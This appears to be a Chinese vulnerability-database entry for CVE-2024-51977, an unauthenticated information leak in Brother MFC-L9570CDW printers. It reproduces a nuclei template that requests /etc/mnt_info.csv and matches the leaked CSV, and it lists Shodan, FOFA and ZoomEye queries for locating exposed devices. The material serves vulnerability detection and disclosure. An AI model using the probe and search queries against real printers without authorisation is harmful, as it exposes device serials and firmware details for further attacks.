Brother MFC-L9570CDW 信息泄露漏洞

漏洞信息

漏洞名称: Brother MFC-L9570CDW 信息泄露漏洞

漏洞编号:

  • CVE: CVE-2024-51977

漏洞类型: 信息泄露

漏洞等级: 中危

漏洞描述: Brother MFC-L9570CDW是一款多功能打印机,广泛应用于企业和家庭环境中,提供打印、复印、扫描等功能。由于其网络功能的便利性,这些设备常被部署在需要共享打印资源的办公网络中。此次发现的信息泄露漏洞影响了该设备的HTTP服务(TCP端口80)、HTTPS服务(TCP端口443)和IPP服务(TCP端口631)。漏洞的根源在于设备未对访问/etc/mnt_info.csv路径的请求进行适当的认证控制,导致未经认证的攻击者可以通过简单的GET请求获取设备的敏感信息。泄露的信息包括设备型号、固件版本、IP地址和序列号等。这些信息可能被攻击者用于进一步的网络攻击,如针对特定型号的固件漏洞利用或网络钓鱼攻击。由于漏洞利用无需认证且可以远程执行,因此对受影响设备的安全性构成了中等程度的威胁。建议用户及时更新设备固件或配置网络访问控制以减轻潜在风险。

产品厂商: Brother

产品名称: Brother MFC-L9570CDW

搜索语法: html:”MFC-L9570CDW”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/526670e12d4aad82b9aadb12f084d6775e60410e/http%2Fcves%2F2024%2FCVE-2024-51977.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42

id: CVE-2024-51977

info:
  name: Brother MFC-L9570CDW - Information Disclosure
  author: DhiyaneshDK,iamnoooob,darses
  severity: medium
  description: |
    An unauthenticated attacker who can access either the HTTP service (TCP port 80), the HTTPS service (TCP port 443), or the IPP service (TCP port 631), can leak several pieces of sensitive information from a vulnerable device. The URI path /etc/mnt_info.csv can be accessed via a GET request and no authentication is required. The returned result is a comma separated value (CSV) table of information. The leaked information includes the device’s model, firmware version, IP address, and serial number.
  reference:
    - https://github.com/sfewer-r7/BrotherVulnerabilities/blob/main/CVE-2024-51977.rb
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MFC-L9570CDW"
    fofa-query:
      - app="brother-Printer"
    zoomeye-query:
      - device="brother-Printer" || app="brother-Printer"
  tags: cve,cve2024,brother,mfc,printer,exposure

http:
  - method: GET
    path:
      - "{{BaseURL}}/etc/mnt_info.csv"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"Model Name"'
          - '"IP Address"'
        condition: and

      - type: dsl
        dsl:
          - "status_code == 200"
          - 'contains(content_type, "text/comma-separated-values")'
        condition: and